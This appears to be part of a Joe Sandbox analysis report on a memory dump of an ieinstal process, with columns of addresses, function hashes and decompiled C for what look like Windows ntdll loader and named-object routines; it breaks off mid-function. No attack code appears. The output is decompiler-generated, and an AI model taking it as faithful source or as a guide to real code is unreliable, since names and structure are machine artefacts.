                                                                                                                0x1e66b0a3
                                                                                                                0x1e66b0ac
                                                                                                                0x1e66ae66
                                                                                                                0x1e66ae6d
                                                                                                                0x1e6b80f3
                                                                                                                0x1e6b80f8
                                                                                                                0x1e6b80f8
                                                                                                                0x1e66ae75
                                                                                                                0x1e6b811c
                                                                                                                0x1e6b8123
                                                                                                                0x1e6b812b
                                                                                                                0x1e6b813e
                                                                                                                0x1e6b814e
                                                                                                                0x1e6b8150
                                                                                                                0x1e6b8157
                                                                                                                0x1e6b816c
                                                                                                                0x1e6b8171
                                                                                                                0x1e6b8179
                                                                                                                0x1e6b8179
                                                                                                                0x1e6b8157
                                                                                                                0x1e66ae82
                                                                                                                0x00000000
                                                                                                                0x1e66ae82
                                                                                                                0x1e66afc7
                                                                                                                0x1e66afd5
                                                                                                                0x1e66afd9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e66afdf
                                                                                                                0x00000000
                                                                                                                0x1e66afdf
                                                                                                                0x1e66ad2b
                                                                                                                0x1e66ad2d
                                                                                                                0x1e66ad2f
                                                                                                                0x1e66ad36
                                                                                                                0x1e66ad66
                                                                                                                0x1e66ad68
                                                                                                                0x1e6b7f61
                                                                                                                0x1e6b7f61
                                                                                                                0x1e66ad73
                                                                                                                0x1e66ad7a
                                                                                                                0x1e66ad7d
                                                                                                                0x1e66ad84
                                                                                                                0x1e66ad8b
                                                                                                                0x1e66ad8f
                                                                                                                0x1e66ad95
                                                                                                                0x1e66af7b
                                                                                                                0x1e66af7b
                                                                                                                0x00000000
                                                                                                                0x1e66ad9b
                                                                                                                0x1e66ad9b
                                                                                                                0x1e66ada0
                                                                                                                0x1e66ada0
                                                                                                                0x1e66ada3
                                                                                                                0x1e66adad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e66adb8
                                                                                                                0x1e6b7f6f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b7f75
                                                                                                                0x1e66adc5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e66adcb
                                                                                                                0x1e66add9
                                                                                                                0x1e6b8034
                                                                                                                0x1e6b8034
                                                                                                                0x00000000
                                                                                                                0x1e6b8034
                                                                                                                0x1e66addf
                                                                                                                0x1e66ade6
                                                                                                                0x1e66ade9
                                                                                                                0x1e66adef
                                                                                                                0x1e66ae21
                                                                                                                0x1e66ae21
                                                                                                                0x1e66ae28
                                                                                                                0x1e66af8b
                                                                                                                0x1e66af91
                                                                                                                0x1e66af91
                                                                                                                0x1e66af8b
                                                                                                                0x1e66ae31
                                                                                                                0x1e66ae33
                                                                                                                0x1e66ae3a
                                                                                                                0x1e66ae3e
                                                                                                                0x1e66ae43
                                                                                                                0x1e66ae4f
                                                                                                                0x1e6b8046
                                                                                                                0x1e66ae55
                                                                                                                0x1e66ae55
                                                                                                                0x1e66ae55
                                                                                                                0x1e66ae5d
                                                                                                                0x1e6b805d
                                                                                                                0x1e6b806a
                                                                                                                0x1e6b807c
                                                                                                                0x1e6b806c
                                                                                                                0x1e6b8075
                                                                                                                0x1e6b8075
                                                                                                                0x1e6b8084
                                                                                                                0x1e6b80a0
                                                                                                                0x1e6b80aa
                                                                                                                0x1e6b80aa
                                                                                                                0x1e6b8084
                                                                                                                0x1e6b805d
                                                                                                                0x1e66ae63
                                                                                                                0x00000000
                                                                                                                0x1e66adf1
                                                                                                                0x1e66adf4
                                                                                                                0x1e66adf6
                                                                                                                0x1e66ae00
                                                                                                                0x1e66ae00
                                                                                                                0x1e66ae04
                                                                                                                0x1e66ae07
                                                                                                                0x1e66ae0e
                                                                                                                0x1e66af08
                                                                                                                0x1e66af19
                                                                                                                0x1e66af1d
                                                                                                                0x1e66afa1
                                                                                                                0x1e6b7fdb
                                                                                                                0x00000000
                                                                                                                0x1e6b7fef
                                                                                                                0x1e6b7fef
                                                                                                                0x1e6b7ff2
                                                                                                                0x1e6b8006
                                                                                                                0x1e6b800e
                                                                                                                0x1e6b8017
                                                                                                                0x1e6b8028
                                                                                                                0x1e66af22
                                                                                                                0x1e66af25
                                                                                                                0x1e6b8030
                                                                                                                0x00000000
                                                                                                                0x1e6b8030
                                                                                                                0x1e66af2b
                                                                                                                0x00000000
                                                                                                                0x1e66af2b
                                                                                                                0x1e6b7fdb
                                                                                                                0x1e66afaa
                                                                                                                0x00000000
                                                                                                                0x1e66afaa
                                                                                                                0x1e66af1f
                                                                                                                0x1e66af1f
                                                                                                                0x00000000
                                                                                                                0x1e66af1f
                                                                                                                0x1e66af0d
                                                                                                                0x1e6b7f81
                                                                                                                0x1e6b7f95
                                                                                                                0x1e6b7f9b
                                                                                                                0x1e6b7fab
                                                                                                                0x1e6b7fb3
                                                                                                                0x1e6b7fbc
                                                                                                                0x1e6b7fc8
                                                                                                                0x1e6b7fcc
                                                                                                                0x1e66af16
                                                                                                                0x1e66af16
                                                                                                                0x1e66af16
                                                                                                                0x00000000
                                                                                                                0x1e6b7f81
                                                                                                                0x1e66af13
                                                                                                                0x1e66af13
                                                                                                                0x00000000
                                                                                                                0x1e66af13
                                                                                                                0x1e66ae14
                                                                                                                0x1e66ae14
                                                                                                                0x1e66ae17
                                                                                                                0x1e66ae1d
                                                                                                                0x00000000
                                                                                                                0x1e66ae1d
                                                                                                                0x1e66af6d
                                                                                                                0x1e66af6d
                                                                                                                0x1e66af6f
                                                                                                                0x1e66af73
                                                                                                                0x00000000
                                                                                                                0x1e66ada0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e66ad38
                                                                                                                0x1e66ad38
                                                                                                                0x1e66ad38
                                                                                                                0x1e66ad3b
                                                                                                                0x1e66ad3e
                                                                                                                0x1e66ad3f
                                                                                                                0x1e66ad46
                                                                                                                0x1e66ad4b
                                                                                                                0x1e6b7f0d
                                                                                                                0x1e6b7f15
                                                                                                                0x1e6b7f29
                                                                                                                0x1e6b7f42
                                                                                                                0x1e6b7f4b
                                                                                                                0x1e6b7f57
                                                                                                                0x1e6b7f57
                                                                                                                0x1e66ad51
                                                                                                                0x1e66ad51
                                                                                                                0x1e66ad51
                                                                                                                0x1e66ad4b
                                                                                                                0x1e66ad5d
                                                                                                                0x1e66ad60
                                                                                                                0x1e66ad62
                                                                                                                0x00000000
                                                                                                                0x1e66ad38

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                • API String ID: 0-3197712848
                                                                                                                • Opcode ID: e20c7c230754f4ffe8ab62ea8c4f866349360ebf8eec554a7e57ab1252bfc53c
                                                                                                                • Instruction ID: 1c705b0102b66c755efe6c1edd6f2a68459de169e0520f5dc08227a1f4f29313
                                                                                                                • Opcode Fuzzy Hash: e20c7c230754f4ffe8ab62ea8c4f866349360ebf8eec554a7e57ab1252bfc53c
                                                                                                                • Instruction Fuzzy Hash: 6E12A371A293929FD310CF15C890BAEB7E5AF89704F844B1EF8958B291D734E944CB93
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E6E8D0A Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1E6E8D0A(intOrPtr __ecx, signed short __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				char _v532;
				char _v536;
				char _v1052;
				char _v1328;
				char _v1332;
				void* _v1404;
				char _v1484;
				char _v1492;
				char _v1496;
				signed short _v1500;
				signed short _v1504;
				char* _v1508;
				short _v1510;
				char _v1512;
				signed int _v1516;
				char _v1520;
				signed short _v1524;
				signed short _v1528;
				signed int _v1532;
				signed int _v1536;
				void* _v1540;
				char _v1544;
				intOrPtr _v1548;
				signed int _v1552;
				void* _v1556;
				char _v1557;
				char _v1569;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t123;
				short _t124;
				signed int _t125;
				signed int _t149;
				signed int _t150;
				char* _t175;
				char* _t177;
				signed int _t205;
				void* _t206;
				signed short _t207;
				signed int _t208;
				intOrPtr _t212;
				signed int _t216;
				signed int* _t219;
				void* _t220;
				signed int _t222;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t230;
				signed int _t232;
				signed int _t234;

				_t215 = __edx;
				_t232 = (_t230 & 0xfffffff8) - 0x614;
				_v8 =  *0x1e74b370 ^ _t232;
				_t219 = _a8;
				_t205 = 0;
				_v1548 = __ecx;
				_v1516 = _v1516 & 0;
				_t222 = __edx;
				E1E698F40( &_v1052, 0, 0x208);
				E1E698F40( &_v532, 0, 0x208);
				_t234 = _t232 + 0x18;
				_v1508 = "\\";
				_t123 = 2;
				_v1512 = _t123;
				_t124 = 4;
				_v1510 = _t124;
				if(_t219 == 0) {
					L73:
					_t125 = 0xc000000d;
					L74:
					_pop(_t220);
					_pop(_t223);
					_pop(_t206);
					return E1E694B50(_t125, _t206, _v8 ^ _t234, _t215, _t220, _t223);
				}
				_t212 = _v1548;
				if(_t212 == 0) {
					goto L73;
				}
				_t216 = _a4;
				_v1552 = _t216;
				_v1552 = _v1552 & 1;
				_v1536 = _t216;
				_v1536 = _v1536 & 0x00000002;
				_v1532 = _t216;
				_v1532 = _v1532 & 0x00000008;
				_a4 = _t216 & 0x00000004;
				_t215 = 0;
				 *_t219 = 0;
				_t219[1] = 0;
				_v1528 = 0;
				_v1524 = 0;
				_v1504 = 0;
				_v1500 = 0;
				_v1556 = 0;
				_v1557 = 1;
				_v1540 = 0;
				if(_t222 == 0) {
					_push( &_v1544);
					_push(4);
					_push( &_v1556);
					_push(0x1d);
					_push(_t212);
					_t224 = E1E692BC0();
					__eflags = _t224;
					if(_t224 < 0) {
						goto L66;
					}
					__eflags = _v1556;
					if(__eflags == 0) {
						goto L4;
					}
					_push( &_v1544);
					_push(0x48);
					_push( &_v1404);
					_push(0x1f);
					_push(_v1548);
					_t224 = E1E692BC0();
					__eflags = _t224;
					if(_t224 < 0) {
						goto L66;
					}
					_t205 = _v1404;
					__eflags = _t205;
					if(__eflags != 0) {
						goto L4;
					} else {
						_t224 = 0xc0000001;
						goto L66;
					}
				} else {
					_t205 = _t222;
					_v1556 = 1;
					L4:
					_push( &_v1544);
					_push(4);
					_push( &_v1540);
					_push(0x2a);
					_push(_v1548);
					_t224 = E1E692BC0();
					if(_t224 < 0) {
						L66:
						E1E663B90( &_v1504);
						if(_t224 < 0) {
							E1E663B90(_t219);
						}
						if(_v1557 != 0) {
							E1E663B90( &_v1528);
						}
						_t134 = _v1516;
						if(_v1516 != 0) {
							E1E663BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t134);
						}
						_t125 = _t224;
						goto L74;
					}
					if(_v1540 == 0) {
						L8:
						_push( &_v1544);
						_push(4);
						_push( &_v1520);
						_push(0xc);
						_push(_v1548);
						_t224 = E1E692BC0();
						if(_t224 < 0) {
							goto L66;
						}
						if(_v1556 == 0) {
							L13:
							_t207 = 0x104;
							L14:
							_push( &_v1544);
							_push(0x118);
							_push( &_v1332);
							_push(0x2c);
							_push(_v1548);
							_t224 = E1E692BC0();
							if(_t224 < 0) {
								goto L66;
							}
							_t225 = _v1556;
							if(_v1540 != 0 || _t225 != 0 || _v1520 != E1E663C40()) {
								_t149 = 0;
								__eflags = 0;
							} else {
								_t149 = 1;
							}
							if(_v1552 != 0) {
								__eflags = _a4;
								if(_a4 != 0) {
									_push(L"AppContainerNamedObjects");
									goto L40;
								}
								_t175 = L"\\AppContainerNamedObjects";
								__eflags = _t225;
								if(_t225 == 0) {
									_t175 = 0x1e625dfc;
								}
								_push(_t175);
								_t150 = E1E6E774F( &_v1052, _t207, L"Global\\Session\\%ld%s", _v1520);
								_t234 = _t234 + 0x14;
							} else {
								if(_t149 != 0) {
									_push(L"\\BaseNamedObjects");
									L40:
									_t215 = _t207;
									_t150 = E1E6E771A( &_v1052, _t207);
									L41:
									_t224 = _t150;
									if(_t224 < 0) {
										goto L66;
									}
									_v1552 = _v1552 & 0x00000000;
									_t215 = 0x208;
									_t214 =  &_v1052;
									_t224 = E1E6E76DA( &_v1052, 0x208,  &_v1552);
									if(_t224 < 0) {
										goto L66;
									}
									if(_v1540 == 0 || _v1536 != 0) {
										_t226 = _v1552;
									} else {
										_t226 = (_v1504 & 0x0000ffff) + 2 + _v1552;
									}
									if(_v1556 != 0) {
										_t226 = _t226 + (_v1528 & 0x0000ffff) + 2;
									}
									if(_v1328 != 0 && _v1532 == 0) {
										E1E695050(_t214,  &_v1492, _v1332);
										_t226 = _t226 + (_v1500 & 0x0000ffff) + 2;
									}
									_t227 = _t226 + 2;
									_t208 = E1E665D60(_t227);
									if(_t208 != 0) {
										E1E698F40(_t208, 0, _t227);
										 *_t219 =  *_t219 & 0x00000000;
										_t234 = _t234 + 0xc;
										_t219[0] = _t227;
										_t219[1] = _t208;
										_t224 = E1E65FE40(_t214, _t219,  &_v1052);
										__eflags = _t224;
										if(_t224 < 0) {
											goto L66;
										}
										__eflags = _v1540;
										if(_v1540 == 0) {
											L59:
											__eflags = _v1556;
											if(_v1556 == 0) {
												L62:
												__eflags = _v1328;
												if(_v1328 != 0) {
													__eflags = _v1532;
													if(_v1532 == 0) {
														_t224 = E1E6710D0(_t214, _t219,  &_v1512);
														__eflags = _t224;
														if(_t224 >= 0) {
															_t224 = E1E6710D0(_t214, _t219,  &_v1492);
														}
													}
												}
												goto L66;
											}
											_t224 = E1E6710D0(_t214, _t219,  &_v1512);
											__eflags = _t224;
											if(_t224 < 0) {
												goto L66;
											}
											_t224 = E1E6710D0(_t214, _t219,  &_v1528);
											__eflags = _t224;
											if(_t224 < 0) {
												goto L66;
											}
											goto L62;
										}
										__eflags = _v1536;
										if(_v1536 != 0) {
											goto L59;
										}
										_t224 = E1E6710D0(_t214, _t219,  &_v1512);
										__eflags = _t224;
										if(_t224 < 0) {
											goto L66;
										}
										_t224 = E1E6710D0(_t214, _t219,  &_v1504);
										__eflags = _t224;
										if(_t224 < 0) {
											goto L66;
										}
										goto L59;
									} else {
										_t224 = 0xc000009a;
										goto L66;
									}
								}
								_t177 = L"AppContainerNamedObjects";
								if(_t225 == 0) {
									_t177 = L"BaseNamedObjects";
								}
								_push(_t177);
								_push(_v1520);
								_t150 = E1E6E774F( &_v1052, _t207, L"%s\\%ld\\%s", L"\\Sessions");
								_t234 = _t234 + 0x18;
							}
							goto L41;
						}
						_t224 = E1E6E64B0(_t212, _t205,  &_v1496);
						if(_t224 < 0) {
							goto L66;
						}
						_t245 = _v1496 - 2;
						if(_v1496 != 2) {
							_t224 = E1E6E6400(_t212, _t215, __eflags, _t205,  &_v1516);
							__eflags = _t224;
							if(__eflags < 0) {
								goto L66;
							}
							_t224 = E1E6739C0(_t205, _t224, __eflags,  &_v1528, _v1516, 1);
							__eflags = _t224;
							if(_t224 < 0) {
								goto L66;
							}
							_push( *((intOrPtr*)(_t205 + 0x34)));
							_push( *((intOrPtr*)(_t205 + 0x30)));
							_push( *((intOrPtr*)(_t205 + 0x2c)));
							_push( *((intOrPtr*)(_t205 + 0x28)));
							_t207 = 0x104;
							_t224 = E1E6E774F( &_v532, 0x104, L"%s\\%u-%u-%u-%u", _v1524);
							_t234 = _t234 + 0x20;
							__eflags = _t224;
							if(_t224 < 0) {
								goto L66;
							}
							E1E663B90( &_v1528);
							E1E695050(_t212,  &_v1532,  &_v536);
							_v1569 = 0;
							goto L14;
						}
						_t224 = E1E6739C0(_t205, _t224, _t245,  &_v1528, _t205, 1);
						if(_t224 < 0) {
							goto L66;
						}
						goto L13;
					}
					_push( &_v1544);
					_push(0x4c);
					_push( &_v1484);
					_push(1);
					_push(_v1548);
					_t224 = E1E692BC0();
					_t240 = _t224;
					if(_t224 < 0) {
						goto L66;
					}
					_t224 = E1E6739C0(_t205, _t224, _t240,  &_v1504, _v1484, 1);
					if(_t224 < 0) {
						goto L66;
					}
					goto L8;
				}
			}


























































                                                                                                                0x1e6e8d0a
                                                                                                                0x1e6e8d12
                                                                                                                0x1e6e8d1f
                                                                                                                0x1e6e8d29
                                                                                                                0x1e6e8d33
                                                                                                                0x1e6e8d35
                                                                                                                0x1e6e8d39
                                                                                                                0x1e6e8d3d
                                                                                                                0x1e6e8d46
                                                                                                                0x1e6e8d5c
                                                                                                                0x1e6e8d61
                                                                                                                0x1e6e8d64
                                                                                                                0x1e6e8d6e
                                                                                                                0x1e6e8d6f
                                                                                                                0x1e6e8d76
                                                                                                                0x1e6e8d77
                                                                                                                0x1e6e8d7e
                                                                                                                0x1e6e9217
                                                                                                                0x1e6e9217
                                                                                                                0x1e6e921c
                                                                                                                0x1e6e9223
                                                                                                                0x1e6e9224
                                                                                                                0x1e6e9225
                                                                                                                0x1e6e9230
                                                                                                                0x1e6e9230
                                                                                                                0x1e6e8d84
                                                                                                                0x1e6e8d8a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8d90
                                                                                                                0x1e6e8d95
                                                                                                                0x1e6e8d9a
                                                                                                                0x1e6e8d9e
                                                                                                                0x1e6e8da2
                                                                                                                0x1e6e8da7
                                                                                                                0x1e6e8dae
                                                                                                                0x1e6e8db3
                                                                                                                0x1e6e8db6
                                                                                                                0x1e6e8db8
                                                                                                                0x1e6e8dba
                                                                                                                0x1e6e8dbd
                                                                                                                0x1e6e8dc1
                                                                                                                0x1e6e8dc5
                                                                                                                0x1e6e8dc9
                                                                                                                0x1e6e8dcd
                                                                                                                0x1e6e8dd1
                                                                                                                0x1e6e8dd5
                                                                                                                0x1e6e8ddb
                                                                                                                0x1e6e8f07
                                                                                                                0x1e6e8f08
                                                                                                                0x1e6e8f0e
                                                                                                                0x1e6e8f0f
                                                                                                                0x1e6e8f11
                                                                                                                0x1e6e8f17
                                                                                                                0x1e6e8f19
                                                                                                                0x1e6e8f1b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8f21
                                                                                                                0x1e6e8f25
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8f2f
                                                                                                                0x1e6e8f30
                                                                                                                0x1e6e8f39
                                                                                                                0x1e6e8f3a
                                                                                                                0x1e6e8f3c
                                                                                                                0x1e6e8f45
                                                                                                                0x1e6e8f47
                                                                                                                0x1e6e8f49
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8f4f
                                                                                                                0x1e6e8f56
                                                                                                                0x1e6e8f58
                                                                                                                0x00000000
                                                                                                                0x1e6e8f5e
                                                                                                                0x1e6e8f5e
                                                                                                                0x00000000
                                                                                                                0x1e6e8f5e
                                                                                                                0x1e6e8de1
                                                                                                                0x1e6e8de1
                                                                                                                0x1e6e8de3
                                                                                                                0x1e6e8de7
                                                                                                                0x1e6e8deb
                                                                                                                0x1e6e8dec
                                                                                                                0x1e6e8df2
                                                                                                                0x1e6e8df3
                                                                                                                0x1e6e8df5
                                                                                                                0x1e6e8dfe
                                                                                                                0x1e6e8e02
                                                                                                                0x1e6e91d5
                                                                                                                0x1e6e91da
                                                                                                                0x1e6e91e1
                                                                                                                0x1e6e91e4
                                                                                                                0x1e6e91e4
                                                                                                                0x1e6e91ee
                                                                                                                0x1e6e91f5
                                                                                                                0x1e6e91f5
                                                                                                                0x1e6e91fa
                                                                                                                0x1e6e9200
                                                                                                                0x1e6e920e
                                                                                                                0x1e6e920e
                                                                                                                0x1e6e9213
                                                                                                                0x00000000
                                                                                                                0x1e6e9213
                                                                                                                0x1e6e8e0d
                                                                                                                0x1e6e8e4a
                                                                                                                0x1e6e8e4e
                                                                                                                0x1e6e8e4f
                                                                                                                0x1e6e8e55
                                                                                                                0x1e6e8e56
                                                                                                                0x1e6e8e58
                                                                                                                0x1e6e8e61
                                                                                                                0x1e6e8e65
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8e70
                                                                                                                0x1e6e8ea9
                                                                                                                0x1e6e8ea9
                                                                                                                0x1e6e8eae
                                                                                                                0x1e6e8eb2
                                                                                                                0x1e6e8eb3
                                                                                                                0x1e6e8ebf
                                                                                                                0x1e6e8ec0
                                                                                                                0x1e6e8ec2
                                                                                                                0x1e6e8ecb
                                                                                                                0x1e6e8ecf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8eda
                                                                                                                0x1e6e8ede
                                                                                                                0x1e6e8ff2
                                                                                                                0x1e6e8ff2
                                                                                                                0x1e6e8efb
                                                                                                                0x1e6e8efd
                                                                                                                0x1e6e8efd
                                                                                                                0x1e6e8ff9
                                                                                                                0x1e6e9036
                                                                                                                0x1e6e903a
                                                                                                                0x1e6e9067
                                                                                                                0x00000000
                                                                                                                0x1e6e9067
                                                                                                                0x1e6e903c
                                                                                                                0x1e6e9041
                                                                                                                0x1e6e9043
                                                                                                                0x1e6e9045
                                                                                                                0x1e6e9045
                                                                                                                0x1e6e904a
                                                                                                                0x1e6e905d
                                                                                                                0x1e6e9062
                                                                                                                0x1e6e8ffb
                                                                                                                0x1e6e8ffd
                                                                                                                0x1e6e902f
                                                                                                                0x1e6e906c
                                                                                                                0x1e6e906c
                                                                                                                0x1e6e9075
                                                                                                                0x1e6e907a
                                                                                                                0x1e6e907a
                                                                                                                0x1e6e907e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e9084
                                                                                                                0x1e6e908e
                                                                                                                0x1e6e9093
                                                                                                                0x1e6e909f
                                                                                                                0x1e6e90a3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e90ae
                                                                                                                0x1e6e90c5
                                                                                                                0x1e6e90b7
                                                                                                                0x1e6e90bf
                                                                                                                0x1e6e90bf
                                                                                                                0x1e6e90ce
                                                                                                                0x1e6e90d8
                                                                                                                0x1e6e90d8
                                                                                                                0x1e6e90e2
                                                                                                                0x1e6e90f7
                                                                                                                0x1e6e9104
                                                                                                                0x1e6e9104
                                                                                                                0x1e6e9106
                                                                                                                0x1e6e910f
                                                                                                                0x1e6e9113
                                                                                                                0x1e6e9123
                                                                                                                0x1e6e9128
                                                                                                                0x1e6e9132
                                                                                                                0x1e6e9135
                                                                                                                0x1e6e9139
                                                                                                                0x1e6e9143
                                                                                                                0x1e6e9145
                                                                                                                0x1e6e9147
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e914d
                                                                                                                0x1e6e9152
                                                                                                                0x1e6e917d
                                                                                                                0x1e6e917d
                                                                                                                0x1e6e9182
                                                                                                                0x1e6e91a6
                                                                                                                0x1e6e91a6
                                                                                                                0x1e6e91ae
                                                                                                                0x1e6e91b0
                                                                                                                0x1e6e91b5
                                                                                                                0x1e6e91c2
                                                                                                                0x1e6e91c4
                                                                                                                0x1e6e91c6
                                                                                                                0x1e6e91d3
                                                                                                                0x1e6e91d3
                                                                                                                0x1e6e91c6
                                                                                                                0x1e6e91b5
                                                                                                                0x00000000
                                                                                                                0x1e6e91ae
                                                                                                                0x1e6e918f
                                                                                                                0x1e6e9191
                                                                                                                0x1e6e9193
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e91a0
                                                                                                                0x1e6e91a2
                                                                                                                0x1e6e91a4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e91a4
                                                                                                                0x1e6e9154
                                                                                                                0x1e6e9159
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e9166
                                                                                                                0x1e6e9168
                                                                                                                0x1e6e916a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e9177
                                                                                                                0x1e6e9179
                                                                                                                0x1e6e917b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e9115
                                                                                                                0x1e6e9115
                                                                                                                0x00000000
                                                                                                                0x1e6e9115
                                                                                                                0x1e6e9113
                                                                                                                0x1e6e8fff
                                                                                                                0x1e6e9006
                                                                                                                0x1e6e9008
                                                                                                                0x1e6e9008
                                                                                                                0x1e6e900d
                                                                                                                0x1e6e900e
                                                                                                                0x1e6e9025
                                                                                                                0x1e6e902a
                                                                                                                0x1e6e902a
                                                                                                                0x00000000
                                                                                                                0x1e6e8ff9
                                                                                                                0x1e6e8e7d
                                                                                                                0x1e6e8e81
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8e87
                                                                                                                0x1e6e8e8c
                                                                                                                0x1e6e8f73
                                                                                                                0x1e6e8f75
                                                                                                                0x1e6e8f77
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8f8d
                                                                                                                0x1e6e8f8f
                                                                                                                0x1e6e8f91
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8f97
                                                                                                                0x1e6e8fa1
                                                                                                                0x1e6e8fa4
                                                                                                                0x1e6e8fa7
                                                                                                                0x1e6e8faa
                                                                                                                0x1e6e8fbf
                                                                                                                0x1e6e8fc1
                                                                                                                0x1e6e8fc4
                                                                                                                0x1e6e8fc6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8fd1
                                                                                                                0x1e6e8fe3
                                                                                                                0x1e6e8fe8
                                                                                                                0x00000000
                                                                                                                0x1e6e8fe8
                                                                                                                0x1e6e8e9f
                                                                                                                0x1e6e8ea3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8ea3
                                                                                                                0x1e6e8e13
                                                                                                                0x1e6e8e14
                                                                                                                0x1e6e8e1a
                                                                                                                0x1e6e8e1b
                                                                                                                0x1e6e8e1d
                                                                                                                0x1e6e8e26
                                                                                                                0x1e6e8e28
                                                                                                                0x1e6e8e2a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8e40
                                                                                                                0x1e6e8e44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6e8e44

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                • API String ID: 2994545307-3063724069
                                                                                                                • Opcode ID: f3c14b30b328ff37aca0601c8d703aeacebe8a64f547712d49931875c3c2c3f0
                                                                                                                • Instruction ID: 7146b4a761a41c8a1adb26cbd7063df696fb7a4695b024703a0e507491080c1b
                                                                                                                • Opcode Fuzzy Hash: f3c14b30b328ff37aca0601c8d703aeacebe8a64f547712d49931875c3c2c3f0
                                                                                                                • Instruction Fuzzy Hash: CFD1D272806355AFD721CE10C844BAFB7E9AF85714F880F6DF98897680E774DD448B92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E6FFDF4 Relevance: 10.3, Strings: 8, Instructions: 348COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E1E6FFDF4(void* __ebx, signed int* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t130;
				signed int _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t149;
				signed int _t150;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t183;
				void* _t184;
				signed char _t192;
				signed int _t193;
				intOrPtr _t195;
				intOrPtr _t199;
				signed int _t209;
				signed int _t226;
				signed char _t236;
				signed int* _t240;
				signed int* _t248;
				signed int _t253;
				signed int _t255;
				signed int _t267;
				signed int _t278;
				signed int* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t286;

				_push(0x40);
				_push(0x1e72d430);
				E1E6A7BE4(__ebx, __edi, __esi);
				_t281 = __ecx;
				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
				 *((char*)(_t284 - 0x19)) = 0;
				 *(_t284 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t284 - 4)) = 0;
					 *((intOrPtr*)(_t284 - 4)) = 1;
					_t130 = E1E647662("RtlReAllocateHeap");
					__eflags = _t130;
					if(_t130 == 0) {
						L72:
						 *(_t284 - 0x24) = 0;
						L73:
						 *((intOrPtr*)(_t284 - 4)) = 0;
